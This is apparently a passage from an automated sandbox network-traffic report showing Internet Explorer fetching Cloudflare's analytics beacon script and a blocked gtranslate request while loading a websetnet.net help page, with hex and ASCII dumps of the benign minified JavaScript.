                                                                                              Data Ascii: TIgMTguODYgMWUyIDQxLjc0YzAgMjIuOTItMTguNjkgNDEuNTctNDEuNjYgNDEuNTd6Ii8+PHBhdGggZD0iTTE2LjY1IDFlMkM3LjQ2IDFlMi4wMiA5Mi41NS4wMiA4My4zN1Y0OS40OWMwLTguOTIgNy4yMy0xNi4xNiAxNi4xNi0xNi4xNmg0Mi4xOS0zMy41Yy00LjUzLjAtOC4yMSAzLjY3LTguMjEgOC4yMVYxZTJ6Ii8+PC9nPjwvc3Zn
                                                                                              2021-12-13 23:57:32 UTC8414INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              12192.168.2.349768104.16.94.65443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8377OUTGET /beacon.min.js/v64f9daad31f64f81be21cbef6184a5e31634941392597 HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Origin: https://websetnet.net
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.cloudflareinsights.com
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8414INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: text/javascript;charset=UTF-8
                                                                                              Content-Length: 13797
                                                                                              Connection: close
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Cache-Control: public, max-age=86400
                                                                                              ETag: W/2021.10.0
                                                                                              Last-Modified: Thu, 09 Dec 2021 19:55:17 GMT
                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 6bd322a64a6b4e68-FRA
                                                                                              2021-12-13 23:57:32 UTC8415INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 72 29 7b 69 66 28 6e 5b 72 5d 29 72 65 74 75 72 6e 20 6e 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 6e 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 72 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 74 29 2c 69 2e 6c 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 6e 3d 7b 7d 3b 74 2e 6d 3d 65 2c 74 2e 63 3d 6e 2c 74 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 74 2e 6f 28 65 2c 6e 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 31 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c
                                                                                              Data Ascii: !function(e){function t(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var n={};t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,
                                                                                              2021-12-13 23:57:32 UTC8416INData Raw: 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 2c 65 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 69 66 28 30 3d 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 22 2f 22 29 29 74 2b 3d 65 3b 65 6c 73 65 20 74 72 79 7b 76 61 72 20 6e 3d 6e 65 77 20 55 52 4c 28 65 29 3b 72 65 74 75 72 6e 20 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 3a 2f 2f 22 2b 6e 2e 68 6f 73 74 2b 6e 2e 70 61 74 68 6e 61 6d 65 7d 63 61 74 63 68 28 65 29 7b 7d 65 6c 73 65 7b 76 61 72 20 72 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 3b 72 26 26 72 2e 6c 65 6e 67 74 68 3e 30 26 26 28 74 2b 3d 72 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 70 65 72 66 6f 72 6d 61 6e 63
                                                                                              Data Ascii: .location.host,e&&"string"==typeof e)if(0===e.indexOf("/"))t+=e;else try{var n=new URL(e);return n.protocol+"://"+n.host+n.pathname}catch(e){}else{var r=window.location.pathname;r&&r.length>0&&(t+=r)}return t}function t(e){if("function"==typeof performanc
                                                                                              2021-12-13 23:57:32 UTC8417INData Raw: 66 69 64 3a 72 2e 66 69 64 2c 72 2e 63 6c 73 3d 5f 2e 63 6c 73 26 26 76 6f 69 64 20 30 21 3d 3d 5f 2e 63 6c 73 2e 76 61 6c 75 65 3f 5f 2e 63 6c 73 3a 72 2e 63 6c 73 29 2c 67 26 26 28 72 2e 73 69 74 65 54 6f 6b 65 6e 3d 67 2e 74 6f 6b 65 6e 29 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 64 28 72 29 7b 76 61 72 20 6f 3d 6c 2e 74 69 6d 69 6e 67 2c 61 3d 6c 2e 6d 65 6d 6f 72 79 2c 63 3d 72 7c 7c 65 28 29 2c 66 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 7c 7c 22 22 2c 64 3d 6d 5b 32 5d 7c 7c 6d 5b 31 5d 7c 7c 6d 5b 30 5d 2c 70 3d 7b 6d 65 6d 6f 72 79 3a 7b 7d 2c 74 69 6d 69 6e 67 73 3a 7b 7d 2c 72 65 73 6f 75 72 63 65 73 3a 5b 5d 2c 74 65 6d 70 52 65 73 6f 75 72 63 65 73 3a 5b 5d 2c 72 65 66 65 72 72 65 72 3a 6b 26 26 4c 26 26 64 3f 64 2e 75 72 6c 3a 66 2c
                                                                                              Data Ascii: fid:r.fid,r.cls=_.cls&&void 0!==_.cls.value?_.cls:r.cls),g&&(r.siteToken=g.token),r}function d(r){var o=l.timing,a=l.memory,c=r||e(),f=document.referrer||"",d=m[2]||m[1]||m[0],p={memory:{},timings:{},resources:[],tempResources:[],referrer:k&&L&&d?d.url:f,
                                                                                              2021-12-13 23:57:32 UTC8418INData Raw: 65 2e 73 65 63 75 72 65 43 6f 6e 6e 65 63 74 69 6f 6e 53 74 61 72 74 29 2c 74 73 3a 65 2e 74 72 61 6e 73 66 65 72 53 69 7a 65 2c 65 63 3a 65 2e 65 6e 63 6f 64 65 64 42 6f 64 79 53 69 7a 65 2c 64 63 3a 65 2e 64 65 63 6f 64 65 64 42 6f 64 79 53 69 7a 65 7d 3b 70 2e 74 65 6d 70 52 65 73 6f 75 72 63 65 73 26 26 76 6f 69 64 20 30 3d 3d 3d 70 2e 74 65 6d 70 52 65 73 6f 75 72 63 65 73 5b 53 5d 26 26 28 70 2e 74 65 6d 70 52 65 73 6f 75 72 63 65 73 5b 53 5d 3d 5b 5d 29 3b 76 61 72 20 6e 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 2e 6c 65 6e 67 74 68 3b 77 2b 6e 3c 36 32 65 33 26 26 70 2e 74 65 6d 70 52 65 73 6f 75 72 63 65 73 3f 28 77 2b 3d 6e 2c 70 2e 74 65 6d 70 52 65 73 6f 75 72 63 65 73 5b 53 5d 2e 70 75 73 68 28 74 29 29 3a 28 53 2b 2b 2c 77 3d 30
                                                                                              Data Ascii: e.secureConnectionStart),ts:e.transferSize,ec:e.encodedBodySize,dc:e.decodedBodySize};p.tempResources&&void 0===p.tempResources[S]&&(p.tempResources[S]=[]);var n=JSON.stringify(t).length;w+n<62e3&&p.tempResources?(w+=n,p.tempResources[S].push(t)):(S++,w=0
                                                                                              2021-12-13 23:57:32 UTC8420INData Raw: 6c 6c 3b 76 61 72 20 74 3d 65 2e 72 65 64 75 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 76 61 6c 75 65 3e 74 2e 76 61 6c 75 65 3f 65 3a 74 7d 29 3b 69 66 28 74 26 26 74 2e 73 6f 75 72 63 65 73 26 26 74 2e 73 6f 75 72 63 65 73 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 6e 3d 74 2e 73 6f 75 72 63 65 73 2e 72 65 64 75 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 6e 6f 64 65 26 26 65 2e 70 72 65 76 69 6f 75 73 52 65 63 74 2e 77 69 64 74 68 2a 65 2e 70 72 65 76 69 6f 75 73 52 65 63 74 2e 68 65 69 67 68 74 3e 74 2e 70 72 65 76 69 6f 75 73 52 65 63 74 2e 77 69 64 74 68 2a 74 2e 70 72 65 76 69 6f 75 73 52 65 63 74 2e 68 65 69 67 68 74 3f 65 3a 74 7d 29 3b 69 66 28 6e 29 72 65 74 75 72 6e 20
                                                                                              Data Ascii: ll;var t=e.reduce(function(e,t){return e&&e.value>t.value?e:t});if(t&&t.sources&&t.sources.length){var n=t.sources.reduce(function(e,t){return e.node&&e.previousRect.width*e.previousRect.height>t.previousRect.width*t.previousRect.height?e:t});if(n)return
                                                                                              2021-12-13 23:57:32 UTC8421INData Raw: 6e 2e 72 65 73 6f 75 72 63 65 73 3d 5b 5d 29 2c 6b 26 26 30 3d 3d 3d 74 26 26 28 6d 2e 70 75 73 68 28 7b 69 64 3a 6e 2e 70 61 67 65 6c 6f 61 64 49 64 2c 75 72 6c 3a 6e 2e 6c 6f 63 61 74 69 6f 6e 7d 29 2c 6d 2e 6c 65 6e 67 74 68 3e 33 26 26 6d 2e 73 68 69 66 74 28 29 29 2c 6f 2e 73 65 6e 64 4f 62 6a 65 63 74 42 65 61 63 6f 6e 28 22 22 2c 6e 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 21 31 2c 41 29 2c 76 6f 69 64 20 30 21 3d 3d 67 2e 66 6f 72 77 61 72 64 26 26 76 6f 69 64 20 30 21 3d 3d 67 2e 66 6f 72 77 61 72 64 2e 75 72 6c 26 26 6f 2e 73 65 6e 64 4f 62 6a 65 63 74 42 65 61 63 6f 6e 28 22 22 2c 6e 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 21 31 2c 67 2e 66 6f 72 77 61 72 64 2e 75 72 6c 29 29 7d 2c 6e 3d 64 28 65 29 3b 69 66 28 6e 26 26 67 29 7b 76 61 72 20
                                                                                              Data Ascii: n.resources=[]),k&&0===t&&(m.push({id:n.pageloadId,url:n.location}),m.length>3&&m.shift()),o.sendObjectBeacon("",n,function(){},!1,A),void 0!==g.forward&&void 0!==g.forward.url&&o.sendObjectBeacon("",n,function(){},!1,g.forward.url))},n=d(e);if(n&&g){var
                                                                                              2021-12-13 23:57:32 UTC8422INData Raw: 6e 75 6c 6c 29 3b 76 61 72 20 6f 3d 69 7c 7c 28 74 2e 73 69 74 65 54 6f 6b 65 6e 26 26 74 2e 76 65 72 73 69 6f 6e 73 2e 66 6c 3f 22 2f 63 64 6e 2d 63 67 69 2f 72 75 6d 3f 22 2b 65 3a 22 2f 63 64 6e 2d 63 67 69 2f 62 65 61 63 6f 6e 2f 70 65 72 66 6f 72 6d 61 6e 63 65 3f 22 2b 65 29 2c 61 3d 21 30 3b 69 66 28 6e 61 76 69 67 61 74 6f 72 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 74 72 79 7b 76 61 72 20 63 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 6d 61 74 63 68 28 2f 43 68 72 6f 6d 65 5c 2f 28 5b 30 2d 39 5d 2b 29 2f 29 3b 63 26 26 63 5b 30 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 63 68 72 6f 6d 65 22 29 3e 2d 31 26 26 70 61 72 73
                                                                                              Data Ascii: null);var o=i||(t.siteToken&&t.versions.fl?"/cdn-cgi/rum?"+e:"/cdn-cgi/beacon/performance?"+e),a=!0;if(navigator&&"string"==typeof navigator.userAgent)try{var c=navigator.userAgent.match(/Chrome\/([0-9]+)/);c&&c[0].toLowerCase().indexOf("chrome")>-1&&pars
                                                                                              2021-12-13 23:57:32 UTC8424INData Raw: 6e 2c 21 30 29 29 29 7d 3b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 6e 2c 21 30 29 2c 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 61 67 65 68 69 64 65 22 2c 6e 2c 21 30 29 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 61 67 65 73 68 6f 77 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 70 65 72 73 69 73 74 65 64 26 26 65 28 74 29 7d 2c 21 30 29 7d 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 69 29 7b 74 2e 76 61 6c 75 65 3e 3d 30 26 26 28 69 7c 7c 6e 29 26 26 28 74 2e 64 65 6c 74 61 3d 74 2e 76 61 6c 75 65 2d 28 72 7c 7c 30 29 2c 28 74 2e 64
                                                                                              Data Ascii: n,!0)))};addEventListener("visibilitychange",n,!0),addEventListener("pagehide",n,!0)},f=function(e){addEventListener("pageshow",function(t){t.persisted&&e(t)},!0)},d=function(e,t,n){var r;return function(i){t.value>=0&&(i||n)&&(t.delta=t.value-(r||0),(t.d
                                                                                              2021-12-13 23:57:32 UTC8425INData Raw: 28 72 2c 69 2c 74 29 2c 75 28 66 75 6e 63 74 69 6f 6e 28 29 7b 70 2e 74 61 6b 65 52 65 63 6f 72 64 73 28 29 2e 6d 61 70 28 6c 29 2c 6e 28 21 30 29 7d 29 2c 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 3d 30 2c 68 3d 2d 31 2c 69 3d 63 28 22 43 4c 53 22 2c 30 29 2c 6e 3d 64 28 72 2c 69 2c 74 29 7d 29 29 7d 2c 53 3d 7b 70 61 73 73 69 76 65 3a 21 30 2c 63 61 70 74 75 72 65 3a 21 30 7d 2c 54 3d 6e 65 77 20 44 61 74 65 2c 45 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 7c 7c 28 72 3d 74 2c 69 3d 65 2c 6f 3d 6e 65 77 20 44 61 74 65 2c 4c 28 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 2c 62 28 29 29 7d 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 3e 3d 30 26 26 69 3c 6f 2d 54 29 7b 76 61 72 20 65 3d 7b 65 6e 74 72 79 54 79 70 65 3a 22 66
                                                                                              Data Ascii: (r,i,t),u(function(){p.takeRecords().map(l),n(!0)}),f(function(){o=0,h=-1,i=c("CLS",0),n=d(r,i,t)}))},S={passive:!0,capture:!0},T=new Date,E=function(e,t){r||(r=t,i=e,o=new Date,L(removeEventListener),b())},b=function(){if(i>=0&&i<o-T){var e={entryType:"f
                                                                                              2021-12-13 23:57:32 UTC8426INData Raw: 75 6c 2d 70 61 69 6e 74 22 2c 6f 29 3b 69 66 28 61 29 7b 6e 3d 64 28 65 2c 69 2c 74 29 3b 76 61 72 20 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 4f 2e 68 61 73 28 69 2e 69 64 29 7c 7c 28 61 2e 74 61 6b 65 52 65 63 6f 72 64 73 28 29 2e 6d 61 70 28 6f 29 2c 61 2e 64 69 73 63 6f 6e 6e 65 63 74 28 29 2c 4f 2e 61 64 64 28 69 2e 69 64 29 2c 6e 28 21 30 29 29 7d 3b 5b 22 6b 65 79 64 6f 77 6e 22 2c 22 63 6c 69 63 6b 22 5d 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 2c 6c 2c 7b 6f 6e 63 65 3a 21 30 2c 63 61 70 74 75 72 65 3a 21 30 7d 29 7d 29 2c 75 28 6c 2c 21 30 29 2c 66 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 69 3d 63 28 22 4c 43 50 22 29 2c 6e 3d 64 28 65 2c 69 2c 74 29 2c 72 65 71 75 65 73 74
                                                                                              Data Ascii: ul-paint",o);if(a){n=d(e,i,t);var l=function(){O.has(i.id)||(a.takeRecords().map(o),a.disconnect(),O.add(i.id),n(!0))};["keydown","click"].forEach(function(e){addEventListener(e,l,{once:!0,capture:!0})}),u(l,!0),f(function(r){i=c("LCP"),n=d(e,i,t),request
                                                                                              2021-12-13 23:57:32 UTC8428INData Raw: 72 79 70 74 6f 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 2e 62 69 6e 64 28 6d 73 43 72 79 70 74 6f 29 3b 69 66 28 72 29 7b 76 61 72 20 69 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 31 36 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 28 69 29 2c 69 7d 7d 65 6c 73 65 7b 76 61 72 20 6f 3d 6e 65 77 20 41 72 72 61 79 28 31 36 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 2c 74 3d 30 3b 74 3c 31 36 3b 74 2b 2b 29 30 3d 3d 28 33 26 74 29 26 26 28 65 3d 34 32 39 34 39 36 37 32 39 36 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2c 6f 5b 74 5d 3d 65 3e 3e 3e 28 28 33 26 74 29 3c 3c 33 29 26 32 35 35 3b 72 65 74 75 72 6e 20 6f 7d 7d 7d 2c 66 75 6e 63 74 69 6f
                                                                                              Data Ascii: rypto.getRandomValues.bind(msCrypto);if(r){var i=new Uint8Array(16);e.exports=function(){return r(i),i}}else{var o=new Array(16);e.exports=function(){for(var e,t=0;t<16;t++)0==(3&t)&&(e=4294967296*Math.random()),o[t]=e>>>((3&t)<<3)&255;return o}}},functio


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              13192.168.2.349775172.67.159.235443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8378OUTGET /tdn-bin/queue.js HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: tdns5.gtranslate.net
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8411INHTTP/1.1 403 Forbidden
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                              Content-Length: 16
                                                                                              Connection: close
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Referrer-Policy: same-origin
                                                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3SuOT9ODX5ZSPvbc0%2FNzOVLTxsMo7X4LZGI24lWaY3fJY0rztF7Z%2FmUjX7lq1HEQDM%2FJuFeyG2aH2wznpOf1U38F27oQCRPS%2FnHLk7muMOV8%2FBGhkhEZvNDs%2BSZsqByUYD4JC69rxg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 6bd322a64c17432d-FRA
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              2021-12-13 23:57:32 UTC8412INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
                                                                                              Data Ascii: error code: 1020


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              14192.168.2.349769104.16.94.65443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8378OUTGET /beacon.min.js/v64f9daad31f64f81be21cbef6184a5e31634941392597 HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Origin: https://websetnet.net
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.cloudflareinsights.com
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8428INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: text/javascript;charset=UTF-8
                                                                                              Content-Length: 13797
                                                                                              Connection: close
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Cache-Control: public, max-age=86400
                                                                                              ETag: W/2021.10.0
                                                                                              Last-Modified: Thu, 09 Dec 2021 19:55:17 GMT
                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 6bd322a659ef42cf-FRA
                                                                                              2021-12-13 23:57:32 UTC8429INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 72 29 7b 69 66 28 6e 5b 72 5d 29 72 65 74 75 72 6e 20 6e 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 6e 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 72 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 74 29 2c 69 2e 6c 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 6e 3d 7b 7d 3b 74 2e 6d 3d 65 2c 74 2e 63 3d 6e 2c 74 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 74 2e 6f 28 65 2c 6e 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 31 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c
                                                                                              Data Ascii: !function(e){function t(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var n={};t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,
                                                                                              2021-12-13 23:57:32 UTC8430INData Raw: 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 2c 65 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 69 66 28 30 3d 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 22 2f 22 29 29 74 2b 3d 65 3b 65 6c 73 65 20 74 72 79 7b 76 61 72 20 6e 3d 6e 65 77 20 55 52 4c 28 65 29 3b 72 65 74 75 72 6e 20 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 3a 2f 2f 22 2b 6e 2e 68 6f 73 74 2b 6e 2e 70 61 74 68 6e 61 6d 65 7d 63 61 74 63 68 28 65 29 7b 7d 65 6c 73 65 7b 76 61 72 20 72 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 3b 72 26 26 72 2e 6c 65 6e 67 74 68 3e 30 26 26 28 74 2b 3d 72 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 70 65 72 66 6f 72 6d 61 6e 63
                                                                                              Data Ascii: .location.host,e&&"string"==typeof e)if(0===e.indexOf("/"))t+=e;else try{var n=new URL(e);return n.protocol+"://"+n.host+n.pathname}catch(e){}else{var r=window.location.pathname;r&&r.length>0&&(t+=r)}return t}function t(e){if("function"==typeof performanc
                                                                                              2021-12-13 23:57:32 UTC8431INData Raw: 66 69 64 3a 72 2e 66 69 64 2c 72 2e 63 6c 73 3d 5f 2e 63 6c 73 26 26 76 6f 69 64 20 30 21 3d 3d 5f 2e 63 6c 73 2e 76 61 6c 75 65 3f 5f 2e 63 6c 73 3a 72 2e 63 6c 73 29 2c 67 26 26 28 72 2e 73 69 74 65 54 6f 6b 65 6e 3d 67 2e 74 6f 6b 65 6e 29 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 64 28 72 29 7b 76 61 72 20 6f 3d 6c 2e 74 69 6d 69 6e 67 2c 61 3d 6c 2e 6d 65 6d 6f 72 79 2c 63 3d 72 7c 7c 65 28 29 2c 66 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 7c 7c 22 22 2c 64 3d 6d 5b 32 5d 7c 7c 6d 5b 31 5d 7c 7c 6d 5b 30 5d 2c 70 3d 7b 6d 65 6d 6f 72 79 3a 7b 7d 2c 74 69 6d 69 6e 67 73 3a 7b 7d 2c 72 65 73 6f 75 72 63 65 73 3a 5b 5d 2c 74 65 6d 70 52 65 73 6f 75 72 63 65 73 3a 5b 5d 2c 72 65 66 65 72 72 65 72 3a 6b 26 26 4c 26 26 64 3f 64 2e 75 72 6c 3a 66 2c
                                                                                              Data Ascii: fid:r.fid,r.cls=_.cls&&void 0!==_.cls.value?_.cls:r.cls),g&&(r.siteToken=g.token),r}function d(r){var o=l.timing,a=l.memory,c=r||e(),f=document.referrer||"",d=m[2]||m[1]||m[0],p={memory:{},timings:{},resources:[],tempResources:[],referrer:k&&L&&d?d.url:f,
                                                                                              2021-12-13 23:57:32 UTC8432INData Raw: 65 2e 73 65 63 75 72 65 43 6f 6e 6e 65 63 74 69 6f 6e 53 74 61 72 74 29 2c 74 73 3a 65 2e 74 72 61 6e 73 66 65 72 53 69 7a 65 2c 65 63 3a 65 2e 65 6e 63 6f 64 65 64 42 6f 64 79 53 69 7a 65 2c 64 63 3a 65 2e 64 65 63 6f 64 65 64 42 6f 64 79 53 69 7a 65 7d 3b 70 2e 74 65 6d 70 52 65 73 6f 75 72 63 65 73 26 26 76 6f 69 64 20 30 3d 3d 3d 70 2e 74 65 6d 70 52 65 73 6f 75 72 63 65 73 5b 53 5d 26 26 28 70 2e 74 65 6d 70 52 65 73 6f 75 72 63 65 73 5b 53 5d 3d 5b 5d 29 3b 76 61 72 20 6e 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 2e 6c 65 6e 67 74 68 3b 77 2b 6e 3c 36 32 65 33 26 26 70 2e 74 65 6d 70 52 65 73 6f 75 72 63 65 73 3f 28 77 2b 3d 6e 2c 70 2e 74 65 6d 70 52 65 73 6f 75 72 63 65 73 5b 53 5d 2e 70 75 73 68 28 74 29 29 3a 28 53 2b 2b 2c 77 3d 30
                                                                                              Data Ascii: e.secureConnectionStart),ts:e.transferSize,ec:e.encodedBodySize,dc:e.decodedBodySize};p.tempResources&&void 0===p.tempResources[S]&&(p.tempResources[S]=[]);var n=JSON.stringify(t).length;w+n<62e3&&p.tempResources?(w+=n,p.tempResources[S].push(t)):(S++,w=0
